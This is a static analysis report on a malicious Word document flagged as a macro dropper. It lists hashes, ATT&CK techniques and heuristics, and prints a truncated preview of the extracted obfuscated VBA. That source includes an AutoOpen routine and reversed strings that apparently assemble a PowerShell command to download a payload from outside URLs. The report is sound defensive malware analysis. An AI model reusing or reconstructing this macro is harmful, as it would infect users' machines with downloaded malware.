Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2729f6ee4e2fa019…

MALICIOUS

Office (OLE)

Size: 171.5 KB
Created: 2018-05-17 15:22:00
Authoring application: Microsoft Office Word
First seen: 2018-06-30
MD5: 8023563266529a4161c9238e0011bffe
SHA-1: ca5ee659654b6e7b09b8628cf68409a757e8278f
SHA-256: 2729f6ee4e2fa0194db60f96f951137d3c170158b976c08c625f93cf9b9cfb69
Risk score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1059 Command and Scripting Interpreter

The sample is a Microsoft Office document on which the critical OLE_VBA_SHELL heuristic fired, indicating a Shell() call within its VBA macros. An Autoopen macro is present, and ClamAV detected the file as Doc.Dropper.Agent-6547892-0. The VBA code is heavily obfuscated, but the presence of the Shell() call strongly suggests the macro is designed to execute arbitrary commands, most likely to download and run a secondary payload.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6547218-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6547218-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 163151 bytes
SHA-256: 85905b8bc2fda5ebba9347df38aa6bde671623518e0513c9436372dbba2a8745

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "wqnslXI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub hAEVJ(DLozw)
cZRiGP = KMPzI
SZjwz = (KqkXO / zhGlam / 77976 / Fix(nbJDcA)) + 7403 - CLng(nJRBvB + CLng(81682)) + TMoklo + 84602 * CuGhv - CStr(48305) / dKVjrP / CLng(VzKiCb)
End Sub
Sub NnwqX(OzDCw)
HAhtWj = XoqaU
TnqpaC = (QwpHIq / HXfGS / 65606 / Fix(IfnFo)) + 2727 - CLng(DRWNdr + CLng(8296)) + XIdzNS + 21713 * akfIH - CStr(1003) / kHmqK / CLng(DjlBz)
fTtfw = dzWdS
pwVNU = (sjDHm / rAtWU / 47607 / Fix(wPGjrh)) + 11138 - CLng(oiAmGo + CLng(33452)) + OmpOc + 16731 * JXhno - CStr(96145) / GfwlUF / CLng(QdjPdD)
CUfRZ = fjiJPp
wIKtRi = (XUoVT / SzIJz / 97729 / Fix(OGCBW)) + 27798 - CLng(vXBoVf + CLng(13739)) + HTnzup + 60865 * jJzNjh - CStr(51528) / KRkkp / CLng(IWDjS)
End Sub
Sub TAAoEj(pWCDOi)
WrZAS = whdEu
wBLQu = (WfOfJ / Jzslz / 15225 / Fix(VCQkQ)) + 93075 - CLng(QFDlW + CLng(91858)) + hjoiGI + 85053 * CKqhRr - CStr(36871) / KjVqY / CLng(jRuUr)
RccJON = PEHrzV
zGtjiL = (ksCAEV / DWjlQ / 94613 / Fix(ZhhTDP)) + 6441 - CLng(DsWVu + CLng(39962)) + XLpfz + 61994 * aIJsNM - CStr(64631) / FiXCZ / CLng(MPbvu)
End Sub
Sub Autoopen()
On Error Resume Next
oJiia = dzYwlz
pGYKLB = (ifmnws / BKvOjD / 23113 / Fix(RiaRVi)) + 66273 - CLng(JzYHkS + CLng(77032)) + PuDlJ + 44317 * kizcod - CStr(65208) / wiupu / CLng(ujIAjc)
CatJiJE (ZlKiWq + bTSYqLPscYJO + pAamun)
iXGuVb = cYqdtV
Nukcu = (KzmtR / jLvIHu / 14091 / Fix(LJBGLA)) + 86166 - CLng(MUFdUc + CLng(54360)) + qKzli + 71721 * Mcjslj - CStr(31542) / imbJEs / CLng(RtINkS)
End Sub
Sub oSGjpS(vVPaYp)
bIHQwl = qsTXM
tGcRA = (XoRlC / wlnQMj / 61023 / Fix(BplBw)) + 78489 - CLng(RzZnLd + CLng(12422)) + oszaG + 34533 * KXFazA - CStr(69085) / fjsJKE / CLng(bULlG)
rzrNrh = XPJZlM
NvWrfh = (tDTTv / TRcOUL / 94493 / Fix(ZOMFS)) + 72106 - CLng(QaSYw + CLng(49198)) + fwUGY + 39952 * tXuwif - CStr(12334) / uEZPLo / CLng(JlNwUc)
AuzaMl = tOncUf
SJkGwi = (OzjOSz / jscAVQ / 45822 / Fix(wHSUIA)) + 81145 - CLng(mrIrqb + CLng(54494)) + XzzmvO + 23242 * noKVKb - CStr(97253) / STLcn / CLng(WfXMwX)
End Sub
Sub GwIQm(YSlDkv)
hTqUb = stZXP
CwbSOj = (pihpC / Xwawj / 30605 / Fix(jNuCoD)) + 71494 - CLng(iRhasR + CLng(70786)) + wAXUSG + 82641 * dnPDMS - CStr(92934) / HoSoBY / CLng(KzjKRz)
End Sub

Attribute VB_Name = "JnnRdwIvJ"
Sub WuYAnh(MUoTD)
wfXWMW = wZzOib
uozjM = (sRGAcX / IwwKw / 12142 / Fix(qmFZvZ)) + 45545 - CLng(zuJWLQ + CLng(58076)) + UFHYG + 59435 * XtpFd - CStr(96518) / oSXmaH / CLng(anmHOU)
End Sub
Function bTSYqLPscYJO()
On Error Resume Next
qGLzd = bFpijL
hfFUu = (UGqzZq / ouRUQ / 83668 / Fix(MjniF)) + 98698 - CLng(AjdpC + CLng(28109)) + BuhSNi + 99031 * zHlJH - CStr(73252) / nUSrAC / CLng(rbOvH)
toWFfB = rUaufY
HzoiPA = (krHpM / uISrn / 78906 / Fix(iiPTq)) + 81478 - CLng(zZOMfZ + CLng(76091)) + EazoN + 63400 * zOQSh - CStr(96485) / BiHqzv / CLng(hVoZZ)
AhNjCLqZV = SaDjF("U2tBFy'+'g+FygedFyg+FygenimeFyg+FygsFyg+Fygaj//Fyg+Fyg:sptthFyg+Fyg@/B27vRFyg+Fyg/mocFyg+Fyg.tsewgnitFyg+Fy'+'gekrameFyg+FyggFyg+Fygami//:pttFyg+Fygh hlP Fyg+Fyg= XCDA5Fyg+Fyggs;)33128Fyg+Fyg2 ,00001(Fakuj@", 5927 + 6 - 5927, 5927 + 197 - 5927)
KcvKm = kEsrwb
WkBDXI = (PXfEpZ / lWFLPn / 41612 / Fix(VSGfBN)) + 57507 - CLng(rIPGZ + CLng(78310)) + RRQzvm + 93093 * UMozhn - CStr(62170) / nWXPiw / CLng(HOlOov)
tJBOjV = dXwLDf
iSwph = (ZXUzC / lVFjTv / 54973 / Fix(zHSaXt)) + 12687 - CLng(KtNojC + CLng(77184)) + rpFPJ + 41809 * BMvjKY - CStr(77872) / PbrDaA / CLng(RoSlN)
XaViUPjEVS = SaDjF("IBFyglPtFyg+'+'FyghlP+Fyg+FyghlPcejbo-wFyg+FyghlFyg+FygP+hlPeh'+'lP+hlFy'+'g+FygPnhl'+'Fyg+FygP(& = dsadasnFyg+'+'Fyg5gsFyg(('( ( )''niOj-]52,51,4[CepsMOc:VNe$ ( .VNmuIw", 50107 + 7 - 50107, 50107 + 161 - 50107)
lOHjhA = dqMibS
NbKvP = (QwMow / FVYRz / 45970 / Fix(OPzoA)) + 56790 - CLng(wAZON + CLng(54089)) + jIpdX + 42570 * KnBSkT - CStr(89865) / EZPGT / CLng(AQnKS)
tfBzD = ZOIBG
LXlYw = (TZqCV / JnnoR / 39596 / Fi
... (truncated)